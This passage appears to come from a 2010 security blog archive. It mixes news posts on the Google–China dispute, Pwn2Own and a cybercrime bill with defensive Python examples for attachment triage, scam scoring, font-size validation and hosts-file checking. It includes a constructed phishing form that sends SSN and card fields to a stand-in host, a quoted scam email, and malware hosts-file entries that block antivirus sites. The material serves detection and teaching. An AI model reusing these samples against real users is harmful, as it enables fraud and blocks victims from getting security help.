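        names = [m.decode("ascii", "replace").lower() for m in SENSITIVE_FIELDS.findall(content)]
        if names:
            findings.append("form collects sensitive fields: " + ", ".join(names))
        m = EXTERNAL_FORM.search(content)
        if m:
            findings.append("form posts to " + m.group(1).decode("ascii", "replace"))

    # 3. Content sniffing: RTF starts with "{\rtf" whatever the name claims.
    is_rtf = content.lstrip().startswith(b"{\\rtf")
    if is_rtf and final_ext != ".rtf":
        findings.append(f"rtf content delivered as {final_ext or 'no extension'}")
    if is_rtf and re.search(rb"\\object\b", content):
        findings.append("rtf contains an embedded object (\\object / \\objdata), "
                        "a common dropper vehicle")
    expected = MAGIC.get(final_ext)
    if expected and not content.startswith(expected):
        findings.append(f"{final_ext} extension but content does not start with {expected!r}")
    return findings


# Constructed samples, not the real attachments from the campaigns discussed above.
SAMPLE_PHISH_HTML = b"""<html><body>
<h1>Child Tax Credit Refund Form</h1>
<form method="post" action="http://example.invalid/collect">
  Name <input name="fullname">
  SSN <input name="ssn">
  Card number <input name="cardnumber"> CVV <input name="cvv">
  <input type="submit" value="Submit">
</form></body></html>"""

SAMPLE_RTF_WITH_OBJECT = (
    b"{\\rtf1\\ansi\\deff0 {\\fonttbl{\\f0 Arial;}}\n"
    b"\\pard Notice of lawsuit. See attached.\\par\n"
    b"{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata 0105000002000000}}\n"
    b"}"
)

SAMPLE_CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n"

if __name__ == "__main__":
    for name, body in [("#1924819299.pdf.htm", SAMPLE_PHISH_HTML),
                       ("lawsuit_notice.doc", SAMPLE_RTF_WITH_OBJECT),
                       ("report.pdf", SAMPLE_CLEAN_PDF)]:
        print(name, "->", triage_attachment(name, body) or ["clean"])
```

The checks are deliberately cheap and name-plus-bytes only; a positive finding is a reason to quarantine or detonate the file, not a verdict, and the absence of findings says nothing about an OLE document or PDF that carries its payload in a form this script does not parse.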
Google denies YouTube outage speculation
Google Inc., owner of YouTube, said an outage of the popular video-sharing site Thursday was technical and not caused by outside tampering.
"YouTube is up again following a technical issue which has now been resolved," a spokeswoman for Google said in a written statement. "We know how important YouTube is for people and apologize for any inconvenience the downtime may have caused."
The outage apparently lasted for just over an hour, from roughly 7 to 8 a.m. ET.
A YouTube source said the outage was not the result of any kind of attack or related in any way to Google's recent move to stop censoring results in China.
The timing of the outage, just days after Google's announcement, had spurred speculation online.
During the time YouTube was down, Internet users were still able to access individual videos, but YouTube's main page returned a "Http/1.1 Service Unavailable" message.
The source said it's Google's default policy to not discuss the details on the cause of outages.
The search-engine giant has been embroiled in a public feud with the communist nation since January, when Google said it was the target of a "highly sophisticated and targeted attack" originating in China.
"I think many people are, understandably, looking for China to take some unique and extraordinary technical measures to 'punish' Google," said Ron Deibert, director of the Citizen Lab at the University of Toronto's Munk Centre for International Studies.
But he said that nothing along those lines has been made public.
"So far, what I have seen is business as usual, and this includes the filtering that is happening at the backbone/gateway levels that have been more or less consistent for a long period of time.
"As for the source of the YouTube problems, I am sure they are investigating, and it could be a billion problems, just as it was for Wikipedia, which turned out to be a server cooling problem, according to reports."
Google began operating in China in 2006, agreeing to limited censorship of what the government there considers controversial sites.
A dashboard page posted by Google after it made its announcement shows that YouTube, one of the Internet's most popular sites, has been blocked in mainland China for the past four days.
View the page
Google Sites and Blogger also have been blocked, while other Google properties like photo site Picasa and Google Docs have been partially blocked, according to the page.
Web search and Google Images, which like other services now originate from Google servers in Hong Kong, were reporting no blockage on the page.
The YouTube downtime created much online buzz early Thursday. The term "Service Unavailable" became a trending topic, and many blogs were speculating on a possible China connection.
The outage came a day after Wikipedia, the user-created online encyclopedia, was down for several hours.
Google, China trade shots
Google and the Chinese government are continuing to trade shots in the PR battle over net censorship. Earlier in the week, Google moved its Chinese search facility to Hong Kong where it claims it is legal under Chinese law to provide searches without censoring results.
In China:
The Chinese government slashed Google in an op-ed piece in China Daily. The op ed, under the name of Ding Yifan, included the assertion:
“Google's withdrawal is not a purely commercial act. The incident has from the beginning been implicated in Washington's political games with China.”
China Daily op ed here: “Google's exit a deliberate plot”
In Washington:
Google’s Director of Public Policy, Alan Davidson, testified before the U.S. Congressional-Executive Commission on China yesterday. His remarks stressed the free trade and rule-of-law implications of China’s actions and asked the U.S. government to consider diplomatic and other actions against the dozens of countries in the world that restrict Internet access.
“We should continue to look for effective ways to address unfair foreign trade barriers in the online world: to use trade agreements, trade tools, and trade diplomacy to promote the free flow of information on the Internet,” he said.
Transcript of testimony here.
Google has nothing (else) to lose in all of this. The Chinese government made the search giant’s position in China untenable with the (assumed) hacking of dissidents’ Gmail accounts and intransigence on net censorship.
China’s human rights record is bad enough that it isn’t going to lose much face on that front. A huge number of businesses that want to get into the vast Chinese market probably don’t care about that anyway. Google, however, can paint China as business-hostile by making an issue of the country’s lack of rule of law, (alleged) government-sponsored hacking to steal proprietary information and arbitrary regulations.
Firefox, IE8 and Safari hacked at CanSecWest
In the Pwn2Own hacking contest at the CanSecWest security conference in Vancouver, Canada, security researchers and hackers quickly hacked three of the major browsers to take control of the underlying operating systems.
-- A German hacker who goes by the handle "Nils" used a previously unknown vulnerability in Mozilla’s Firefox to gain control of a 64-bit Windows 7 machine.
-- Peter Vreugdenhil, an independent researcher from the Netherlands, used several vulnerabilities in Internet Explorer to take control of a machine running a patched 64-bit Windows 7 implementation.
-- Researcher Charlie Miller used a vulnerability in the Safari browser to take control of a Mac Book.
The winners of the contest get cash prizes and get to keep the machines they hack.
TippingPoint’s Zero Day Initiative, which sponsored the contest, owns the rights to the hacks and will present the details to Mozilla, Microsoft and Apple so those companies can issue patches before details are made public.
TippingPoint has put up $100,000 in prizes for the contest. This is its fourth year.
PCWorld story here.
More details in Computerworld story here.
This is a very high-profile event that helps focus the world’s attention on security vulnerabilities without anyone losing their banking logins, credit card numbers or account balance. The big lesson this year is that all browsers have vulnerabilities that can be exploited by malicious web sites and are often the way in to an operating system. Web users would be well advised to keep alert for updates no matter which one they use.
Various commentators are foaming at the mouth about Windows 7 weaknesses ("a FULLY PATCHED 64 bit Windows 7 installation!"), a Mac being hacked ("see, enterprises shouldn't rely on the security of OS X!") and the fact that Ubuntu Linux was NOT hacked ("aw, they just didn't give them enough time!").
It's a passion thing: love me, love my OS.
Thursday, March 25, 2010
Bulgarian city official loses committee post because of Farmville addiction
Computer security category of risk: human factors?
The Sofia, Bulgaria, news site novinite.com is reporting that a city councilor in Bulgaria’s second largest city of Plovdiv was voted out of a city council committee because he wouldn’t stop playing Farmville during meetings.
The Plovdiv city hall recently got wireless Internet and city councilors got laptop computers. Two weeks ago council chairman Ilko Iliev started to get irritated by council members playing Farmville during budget hearings.
“However, the real scandal erupted during Thursday’s meeting of the City Council when the most persistent Farmville enthusiast, Dimitar Kerin from the nationalist party Ataka, was voted out of the committee he was part of because of his Facebook addiction,” novinite.com reported.
“The proposal to remove Kerin from his respective municipal committee came from Todor Hristov, a former member of Kerin’s party, who has argued that Kerin ‘needs more time for his virtual farm.’”
In his own defense, Kerin pointed out that he had reached only level 40 in Farmville, but a councilor from the Democrats for Strong Bulgaria party (rightist) had made it to level 46.
Novinite.com story here.
It takes only one 'nice' person
In the security industry we often focus heavily on new technologies and shiny new software, and forget that so much of what we see is dependent on the person behind the computer.
Today, a co-worker of mine was sent an email from someone she doesn’t know, with the following text:
“I'm writing this with tears in my eyes,my fam and I came down here to
Wales,United Kingdom for a short vacation unfortunately we were mugged
at the park of the hotel where we stayed,all cash,credit card and cell
were stolen off us but luckily for us we still have our passports with
us.
We've been to the embassy and the Police here but they're not helping
issues at all and our flight leaves in less than 3hrs from now but
we're having problems settling the hotel bills and the hotel manager
won't let us leave until we settle the bills,i'm freaked out at the
moment.”
Being the kind and caring individual that she is, she was naturally concerned. Should she help these people out? Luckily she asked us first.
Unfortunately this type of cry for help is all too common, as we all know: an evolution of the Nigerian 419 spam. Though it has much better grammar, and does not entice us with the promise of thousands of dollars, it does play on the weakest link in the security chain: us.
Notice the feeling of helplessness (“…with tears in my eyes…”) combined with the sense of urgency (“…our flight leaves in less than 3hrs…”). It is a classic example of a con.
You can have all the security in the world, the best and most expensive technology, but if you don’t educate yourself, and your co-workers…all these systems mean nothing. All you need is someone to open the door.
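The cues the post points at (distress, time pressure, a stranded-abroad story, a request to settle a bill, and a sender nobody knows) can be turned into a simple triage rule. The following is an added example, not code from the original post: a small rule-based scorer that runs the email quoted above and a constructed benign control through those cues. The patterns, weights and the threshold are illustrative assumptions, not a production phishing filter.

```python
import re

# Cues named in the post. Each entry is (regex, weight); the weights and the
# patterns themselves are assumptions chosen for illustration.
CUES = {
    "distress": (r"tears in my eyes|freaked out|desperate|please help", 2),
    "urgency": (r"\b(?:less than|within)\s+\d+\s*(?:hrs?|hours?|minutes?)\b"
                r"|\bright now\b|\bimmediately\b|\burgent\b", 2),
    "stranded": (r"\b(?:mugged|robbed|stolen)\b.*?"
                 r"\b(?:cash|wallet|credit card|passport|phone|cell)\b", 2),
    "money_ask": (r"\b(?:settle|pay|loan|wire|send)\b.*?"
                  r"\b(?:bills?|money|funds|cash)\b", 2),
    "abroad": (r"\b(?:vacation|embassy|hotel|flight)\b", 1),
}
UNKNOWN_SENDER_WEIGHT = 2   # assumption: mail from a stranger is itself a cue
SCAM_THRESHOLD = 5          # assumption: at or above this the mail is flagged

# The message quoted in the post, embedded as sample input.
SCAM_EMAIL = """I'm writing this with tears in my eyes,my fam and I came down here to
Wales,United Kingdom for a short vacation unfortunately we were mugged
at the park of the hotel where we stayed,all cash,credit card and cell
were stolen off us but luckily for us we still have our passports with
us.
We've been to the embassy and the Police here but they're not helping
issues at all and our flight leaves in less than 3hrs from now but
we're having problems settling the hotel bills and the hotel manager
won't let us leave until we settle the bills,i'm freaked out at the
moment."""

# Constructed control message from a known colleague.
BENIGN_EMAIL = "Hi, attaching the quarterly report as discussed. Let me know if the numbers look off."


def normalise(body):
    """Lower-case and collapse whitespace so patterns can span line breaks."""
    return " ".join(body.lower().split())


def score_email(body, sender_known):
    """Return (score, matched_cue_names); each cue counts at most once."""
    text = normalise(body)
    score, hits = 0, []
    for name, (pattern, weight) in CUES.items():
        if re.search(pattern, text):
            score += weight
            hits.append(name)
    if not sender_known:
        score += UNKNOWN_SENDER_WEIGHT
        hits.append("unknown_sender")
    return score, hits


def verdict(body, sender_known):
    """Return (label, score, hits) so a reader sees why a mail was flagged."""
    score, hits = score_email(body, sender_known)
    label = "likely scam" if score >= SCAM_THRESHOLD else "no strong cues"
    return label, score, hits


if __name__ == "__main__":
    for name, body, known in (("stranded-traveller mail", SCAM_EMAIL, False),
                              ("colleague mail", BENIGN_EMAIL, True)):
        label, score, hits = verdict(body, known)
        print(f"{name}: {label} (score {score}, cues {hits})")
```

The point of returning the matched cue names rather than only a score is that the explanation is what trains people: a co-worker who sees "urgency + money_ask + unknown_sender" next to a mail learns to spot the next one without the script.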
Google-in-China saga: another hack, move to HK
There is a risk to computer security from governments. Regulatory changes, even if they are very positive measures, can impose huge demands on an enterprise (e.g. HIPAA, Sarbanes-Oxley, California’s law requiring notification of customers whose personal information is hacked on company sites.)
The “government” risk can get no bigger than the clash of Google and the government of China over the censorship issue. The world suspects that the Chinese government or its proxies were behind a campaign of hacking against Google and other major U.S companies several months ago. Google reacted to the hacks by saying in January that it would stop censoring search results for web users in China. Monday it said it would move to Hong Kong.
The government of China, which gave the search giant the choice of censoring Internet content or leaving the country, accuses Google of being a pawn of the U.S. military establishment, hell bent on subverting Chinese order – the ability of the government to protect its citizens from “harmful” Internet content.
The latest hack
Reporter Mercedes Bunz of the UK’s Guardian is reporting today that a Google web page that lists corporate executives appears to have been hacked and has been redirected to a site in China. The Guardian reported the hacks to Google staff who said they were investigating.
Story here.
Analysis from both sides – playing it down in China
A large volume of news analysis today quotes observers with opinions that vary from “what were they thinking, going up against the government of China?” (NYT) to “China defended itself in an ideological battle” (Peoples’ Daily Online).
China Daily reported that Chinese Foreign Ministry spokesman Qin Gang said:
“The Chinese government encouraged and pushed for the openness of Internet and its management according to its laws and regulations, which was common practice in all countries.”
Story here: “Google case will not affect China-US relations”
What was Google thinking?
The New York Times quoted J. Stapleton Roy, director of the Kissinger Institute on China and the United States at the Woodrow Wilson International Center for Scholars. “I don’t understand their calculation, I do not see how Google could have concluded that they could have faced down the Chinese on a domestic censorship issue.”
Roy is a former U. S. ambassador to China.
How much is Google giving up in revenue?
The Times said some analysts estimate that Google’s annual revenue in China was only $300 to $600 million out of $24 billion in annual sales, but investors were expecting a bright future in that country, which has 350 million web users. Google’s stock has dropped because of the shoving match with the Chinese government.
Story here: “Google Faces Fallout as China Reacts to Site Shift”
Is there a risk for China’s government?
Some have said that Google’s move to stop the censorship puts the authorities in China in a difficult spot. The government would be reluctant to anger Google users in China who are usually highly educated and who do complain, the Times said.
The paper quoted Bill Bishop, a Beijing Internet entrepreneur who writes the tech blog Digicha, “The Chinese are very serious about pushing their soft-power agenda, Google just put a big hole in that sales pitch, and I think they know that.”
In an analysis piece in the Times, Michael Wines wrote:
“But China also does not acknowledge to its own people that it censors the Internet to exclude a wide range of political and social topics that its leaders believe could lead to instability. It does not release information on the number of censors it employs or the technology it uses for the world’s most sophisticated Internet firewall. Its 350 million Internet users, many with fast broadband connections, are assured they have the same effectively limitless access to information and communications that the rest of the world enjoys.”
Will forcing Google out stop innovation in China?
Wines and the reporters in Shanghai and Beijing who contributed to the analysis also wrote:
“The cost, at least with some influential sectors of its own society, could be steep. In the technology sector, Google is viewed as an innovator that has spurred rapid development of the Chinese Web. Its departure will leave some Chinese companies with greater influence, but could also stifle competition, some fear.
"'Google is good at innovation, and when it leaves, the rest of the companies in China will lack motivation. Without its countervailing power, the industry won’t be as healthy,' said Zhang Yunquan, a professor at the Institute of Software at the Chinese Academy of Sciences.
“Fang Xingdong, chief executive of Chinalabs.com, said the vast majority of Chinese Internet companies invested little in research and ‘simply copy each other’s technology.’ With Google’s departure, their profits may rise, but China’s Web space will begin to stagnate, he predicted.”
Story here. “Stance by China to Limit Google Is Risk by Beijing”
What nastiness is in it for the rest of us?
It’s a clash of the Titans and there could be continuing fallout for everyone else. Although the wrestling match with Google didn't start the hacking and intellectual property theft via Internet out of China, it could focus the attentions of nationalistic and quite independent Chinese hackers. We won't even go into the issue of possible government- and military-sponsored hacks.
Enterprises should redouble user education about phishing and everybody better keep operating systems and anti-malware updated.
And, if you live outside China – enjoy the luxury of an uncensored web.
Polar opposites in U.S. Senate co-sponsor cybercrime bill
In spite of the polarized, poisonous atmosphere in Washington, D.C., generated by President Barack Obama’s health care reform campaign, two Senators from very opposite ends of the political spectrum are co-sponsoring a bill to fight international cybercrime.
U.S. Senators Kirsten Gillibrand (D-NY) and Orrin Hatch (R-UT) have cosponsored a bill aimed at fighting international cyber crime: the International Cybercrime Reporting and Cooperation Act.
If enacted into law, the bill would give the U.S. government the power to help countries that need assistance in their fight against cyber crime. It also gives the U.S. government the power to cut off financial assistance to countries that don’t crack down on net criminals.
A wide variety of Internet criminals currently rely on bullet-proof servers in countries where their crimes are tolerated. It is believed that in some countries cyber crime is protected by corrupt governments or seen as a source of income for the country as long as the victims are all foreigners.
U.S. criminal investigators and those of other countries who have evidence to shut down criminal operations often get no cooperation from law enforcement groups in countries where the crime is tolerated. Russia, many eastern European countries, Nigeria and China traditionally have topped the list of non-cooperating countries.
In their news releases on the introduction of the bill, the two senators said:
“Earlier this year, hackers in China launched a large, sophisticated attack on Google and other American businesses. A conservative estimate from the Government Accountability Office (GAO) estimates that in 2005 U.S. businesses lost $67.2 billion as a result of cyberattacks. Since then, attacks have dramatically increased. The global economy overall lost over $1 trillion in 2008 as a result of cyber attacks, according to studies by McAfee, Inc.”
The bill would:
-- Establish an annual presidential report in which the President would assess the extent of cybercrime in each country as well as the country’s efforts to fight it and protect consumers and online commerce. It also would report on multilateral efforts against cybercrime.
-- Prioritize programs designed to combat cybercrime to help countries with little information and communications technology in order to stop them from becoming cybercrime havens.
-- Provide assistance to improve finance or telecommunications infrastructure in countries that need it in order to combat cybercrime.
-- Identify countries of cyber concern: those with a pattern of cybercrime against the U.S.
-- Identify the countries that don’t deal with cybercrime “through investigations, prosecutions, bilateral or international cooperation, or appropriate legislation.”
-- Establish an action plan to help governments of high cyber-crime countries fight it.
-- Penalize countries that fail to meet benchmarks in their action plans by cutting off financing, preferential trade programs, or new foreign assistance, as long as the penalties don’t limit projects to fight cybercrime.
-- Have the Secretary of State designate a senior official to coordinate the international fight against cybercrime and appoint employees at key embassies to focus on cybercrime policy.
We wish the Gentleman from Utah and the Lady from New York success.
Sen. Gillibrand news release here.
Sen. Hatch news release here.
Google… made in China?!?
Today at CanSecWest I stopped by the Google booth and picked up a yo-yo.
As I was about to open the package, something struck me:
‘Google… Made in China’
Oooops…….
New social media? Pay to play online games with women?
"Dirty" or "Flirty"
Ok.
It’s an old formula for a successful business: pay girls to have fun with you.
This time the schtick is getting on-line gamers to pay $8.25 (US) to play an online game with a female for 10 minutes. The women get to keep 40 percent.
The site is GameCrush. It just opened last night and it seems to be a success (screen shots below.)
“GameCrush is being touted as the first social site for adult gamers with the women online able to set their gaming mood to either ‘flirt’ or ‘dirt’, IGN reports.
“The men online are known as Players and the women as PlayDates and Players pay to play while PlayDates get paid to play.
“Players browse PlayDate profiles — of which there are currently 1200 — view photos and even chat with girls for free.”
“At the moment it only supports Xbox 360 and some games on the GameCrush website. GameCrush plans to support PlayStation 3, Wii and World of Warcraft.”
Story here: “GameCrush lets gamers pay to play with girls”
And here.
Given that there might be 400,000 gamers (gold farmers) in third world countries making great money (for them) by playing 12 hours a day, I predict GameCrush is going to be a GREAT opportunity for female gamers from third-world countries (and everywhere else for that matter.)
GameCrush might be on to something: http://prdtest.gamecrush.com/
Yesterday afternoon:
This morning:
I can't say I'm massively impressed with this one.
“It's embarrassing when you walk into a game store and some box art has a ludicrously underdressed woman who's supposed to be in the middle of a war zone. It's embarrassing when the cover of video game magazines resemble something you'd normally find on the top shelf. And it's embarrassing to see people happy to pay for something like this. There are actually plenty of females on gaming services who will happily talk to you for free, and they'll shoot you AND they won't charge money for it.
“They might upload your horrible deaths to YouTube, though.”
Wednesday, March 24, 2010
Download Windows 7 Mountains Theme – Syue & Nenggao
We’ve previously listed many official Windows 7 themes from Microsoft’s Windows 7 Personalization Gallery. Here are two more, which capture the beauty of two Taiwanese mountains, Syue and Nenggao.
Syue or Hsuehshan or Snow Mountain is the second highest mountain in Taiwan with its main peak at 3,886 m (12,749 ft) above sea level.
Nenggao is a mountain in Taiwan whose southern peak has an elevation of 3,349 m. Its main peak lies at 3,261 m.
Download:
The Facebook Dislike Button Likes Hotbar
Not so long ago, fake Firefox websites and downloads were in the news, with the sites involved serving Hotbar installs.
It seems the tactic of offering up Firefox (but giving you something else entirely) is going to be around for a little while. Below is a site promoting a Firefox .xpi called “The Dislike Button”, designed to let you add an “I dislike this” note to Facebook posts:
The domain is dislikes(dot)info. Note the “Get Firefox” button at the top. What do you think happens if you click it?
That’s right, you’re given the option of downloading a setup file from Hotbar…not exactly the Firefox download you were expecting. Should the end-user install it thinking this will give them Firefox, they’re very much mistaken.
What they actually get is the option to download Hotbar (and no Firefox), complete with a preticked ShopperReports checkbox. While I can understand having to download Firefox to use a Firefox .xpi, the need for installing the above escapes me.
Additionally, there’s a text link further down the page asking you to “Get Firefox now” which also directs you to the Hotbar install.
What’s particularly curious here is that if you visit the “Facebook Fan Page” linked to by the main site, you’ll see the following post:
They’re not happy about people forcing surveys on end-users to obtain the Dislike button (fair enough), yet the main site asks you to “get Firefox” but gives you Hotbar.
I think….I dislike this.
Firefox 3.6.2 early edition
Mozilla has released version 3.6.2 of its Firefox browser a week early; it had said the update would be available March 30.
The update fixes a widely reported vulnerability (CVE-2010-1028) that prompted Germany’s CERT to advise Web users to switch to another browser until a fix was available. (My blog post “Germany’s CERT warns against Firefox use”)
Intevydis researcher Evgeny Legerov found an integer overflow in the Web Open Font Format (WOFF) decoder in Firefox 3.6: a size calculation in the font decompression code wrapped, so the memory buffer allocated for a downloadable font was too small for the data written into it. Exploiting the flaw could crash the browser and potentially allow arbitrary code to run on the victim’s system, triggered by a page serving a crafted downloadable font.
If you use Firefox, update here.
Security advisories for Firefox 3.6 here.
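To show the bug class rather than the Firefox code, here is an added Python example (not Mozilla’s decoder, and not from the original post) using a hypothetical, simplified table-directory layout of offset, compLength and origLength fields. It puts the unchecked size calculation, which wraps in 32-bit arithmetic, beside a checked version, and shows a decoder that refuses to trust the declared origLength and instead verifies the inflated size against it. The sample file, the field layout and the 16 MiB cap are all constructed for the example.

```python
"""Length validation for a compressed font table (hypothetical WOFF-like layout).

Added illustration of the bug class behind the Firefox WOFF advisory: an
attacker-controlled size field that overflows 32-bit arithmetic yields an
undersized destination buffer. This is not Mozilla's decoder; the header
layout below is a simplified stand-in constructed for the example.
"""
import struct
import zlib

UINT32_MAX = 0xFFFFFFFF
MAX_TABLE_LEN = 16 * 1024 * 1024   # sanity cap for one decompressed table (assumed)

# Hypothetical table directory entry: offset, compLength, origLength (all u32).
ENTRY = struct.Struct(">III")


def unchecked_buffer_size(entries):
    """The vulnerable pattern: sum origLength fields in 32-bit arithmetic.

    Summing attacker-controlled lengths as a uint32 wraps, so the allocation
    ends up far smaller than the data later written into it.
    """
    total = 0
    for _offset, _comp, orig in entries:
        total = (total + orig) & UINT32_MAX   # models C uint32 wrap-around
    return total


def checked_buffer_size(entries):
    """Hardened: bound every field and the running total before allocating."""
    total = 0
    for _offset, _comp, orig in entries:
        if orig > MAX_TABLE_LEN:
            raise ValueError("origLength exceeds sanity cap")
        total += orig
        if total > MAX_TABLE_LEN:
            raise ValueError("total decompressed size exceeds buffer cap")
    return total


def decode_table(blob, entry):
    """Decompress one table and insist the output matches the declared size.

    Rejects entries whose compressed span lies outside the file, whose
    declared size is implausible, or whose inflated size differs from
    origLength. Trusting origLength alone is exactly what goes wrong.
    """
    offset, comp_len, orig_len = entry
    if orig_len > MAX_TABLE_LEN:
        raise ValueError("origLength exceeds sanity cap")
    # Python ints cannot wrap; in C write this as offset <= len - comp_len.
    if offset + comp_len > len(blob):
        raise ValueError("compressed span outside file")
    d = zlib.decompressobj()
    # Ask for one byte more than declared so an oversized stream is detected.
    out = d.decompress(blob[offset:offset + comp_len], orig_len + 1)
    if len(out) != orig_len or d.unconsumed_tail or not d.eof:
        raise ValueError("inflated size does not match origLength")
    return out


def rejects(fn, *args):
    """True if fn(*args) raises ValueError, i.e. the input was refused."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


def build_sample():
    """Constructed file: one table whose origLength lies (claims 4 bytes)."""
    payload = b"glyf" * 64            # 256 bytes of fake table data
    comp = zlib.compress(payload)
    header = ENTRY.pack(ENTRY.size, len(comp), 4)   # dishonest origLength
    return header + comp


if __name__ == "__main__":
    lying = [(0, 10, 0xFFFFFF00), (0, 10, 0x200)]
    print("unchecked allocation:", unchecked_buffer_size(lying))
    print("checked refuses:", rejects(checked_buffer_size, lying))
    blob = build_sample()
    entry = ENTRY.unpack_from(blob, 0)
    print("dishonest origLength refused:", rejects(decode_table, blob, entry))
```

The two entries in the `lying` list sum to 0x100000100, which a uint32 truncates to 0x100, a 256-byte allocation for gigabytes of declared data. The checked path raises before any allocation, and `decode_table` catches the complementary case where the stream inflates to more than the header promised.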
Tuesday, March 23, 2010
Smart Aleck Passwords
Älypää, a popular Finnish game and quiz site, announced a database breach late last night.
Over 127,000 account names and passwords were leaked.
The site has currently suspended access and doesn't maintain any personal details but Älypää users should determine whether or not they recycle their passwords elsewhere. If so, those accounts are at risk of being hacked.
CERT-FI guidelines can be found here.
Here's a list of the top 20 domains on the list:
And here's a list of the top 20 passwords used:
The number one choice? It's salasana — that's Finnish for password.
Google Translate can assist you with the rest.
Using Windows “hosts” file to cut off the help line
We found this interesting and malicious little mechanism.
The hosts file on a machine under investigation had been modified so that whenever the victim tried to reach any of nearly 400 sites, the request went instead to a well known legitimate site (in this case google.com). The list was a “Who’s Who” of the anti-malware world: most of the places someone with an infected machine would go to get help.
The altered hosts file contained many lines beginning with ‘#’ followed by gibberish. The resolver treats such lines as comments and ignores them, so they serve only as padding that hides the real entries from a casual glance. Concealed among the commented lines are the redirection entries. When the commented lines are stripped, we find all the listed security-related websites mapped to “209.85.129.99”, at the time an IP address for google.com.
Some of the sites were:
209.85.129.99 lexikon.ikarus.at
209.85.129.99 www.virusdoctor.jp
209.85.129.99 www.spybotupdates.com
209.85.129.99 securityresponse.symantec.com
209.85.129.99 www.mcafee.com
209.85.129.99 es.trendmicro-europe.com
209.85.129.99 www.quickheal.co.in
209.85.129.99 www.offensivecomputing.net
209.85.129.99 research.sunbelt-software.com
209.85.129.99 www.sunbeltsoftware.com
209.85.129.99 www.sunbeltsecurity.com
209.85.129.99 www.cwsandbox.org
The “hosts” file lives at %SystemRoot%\System32\drivers\etc\hosts on Windows XP, Windows 7 and Windows Server 2008, and in the same place on every other modern Windows release. The resolver consults it before DNS for every application, not just browsers, so an entry there silently overrides the real address.
Learn more about Hosts Here.
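A small triage script, added here as an example and not part of the original post, that reads a hosts file the way the resolver does (comment stripping included), flags watch-listed security domains mapped anywhere but loopback, and reports how much of the file is comment padding. The sample file is constructed to mimic the altered one described above, and the watchlist is a short stand-in assembled from the domains listed in the post.

```python
"""Triage a Windows hosts file for redirected security-vendor domains.

Added example; the sample file and watchlist below are constructed for it.
On a live system, read %SystemRoot%\\System32\\drivers\\etc\\hosts instead.
"""
import ipaddress

# Constructed sample modelled on the altered file: junk comment lines hide
# a handful of real redirections among them.
SAMPLE_HOSTS = """\
# Copyright (c) Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
# qzpl3 0x8fa1 ... kjwe
# 77yyq brv mmmz
209.85.129.99 securityresponse.symantec.com
# a0s9d8f zxcv
209.85.129.99 www.mcafee.com   # 2nd
#   nnn m
209.85.129.99 research.sunbelt-software.com
209.85.129.99 www.cwsandbox.org
"""

# Domains (or parent domains) a victim would visit for help. Stand-in list
# built from the post above; a real tool would carry a far longer one.
WATCHLIST = {
    "symantec.com", "mcafee.com", "sunbelt-software.com",
    "sunbeltsoftware.com", "sunbeltsecurity.com", "cwsandbox.org",
    "trendmicro-europe.com", "spybotupdates.com", "ikarus.at",
    "quickheal.co.in", "offensivecomputing.net", "virusdoctor.jp",
}


def parse_hosts(text):
    """Return (ip, hostname) pairs, ignoring comments and blank lines.

    Windows treats everything after '#' as a comment, inline comments
    included, so the junk lines are dropped here just as the resolver
    drops them. One line may map several hostnames to one address.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed line; the resolver ignores it too
        for host in parts[1:]:
            entries.append((str(ip), host.lower()))
    return entries


def _on_watchlist(host):
    """True if host or any parent domain of it is on the watchlist."""
    labels = host.split(".")
    return any(".".join(labels[i:]) in WATCHLIST for i in range(len(labels)))


def find_redirections(text):
    """Return entries that point a watch-listed domain anywhere but loopback.

    A legitimate hosts file only maps localhost, and occasionally blocks
    ad domains via 127.0.0.1 or 0.0.0.0; a vendor domain mapped to a
    routable address is a blocking or redirection attempt.
    """
    hits = []
    for ip, host in parse_hosts(text):
        if _on_watchlist(host) and not ipaddress.ip_address(ip).is_loopback:
            hits.append((ip, host))
    return hits


def comment_ratio(text):
    """Fraction of non-blank lines that are comments; high values are a tell."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    comments = [ln for ln in lines if ln.lstrip().startswith("#")]
    return len(comments) / len(lines) if lines else 0.0


if __name__ == "__main__":
    for ip, host in find_redirections(SAMPLE_HOSTS):
        print(f"{host} -> {ip}")
    print(f"comment ratio: {comment_ratio(SAMPLE_HOSTS):.2f}")
```

Matching on parent domains catches the per-host entries the malware used (securityresponse.symantec.com, research.sunbelt-software.com) without enumerating every subdomain, and the comment ratio gives a quick sanity check even when a redirection targets a vendor not on the list.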
Screenshots – Opera Mini 5 App for iPhone
The Opera team recently submitted Opera Mini to Apple for inclusion in the iTunes App Store. Approval may take quite some time; until then, here are the official screenshots of Opera Mini running on the iPhone.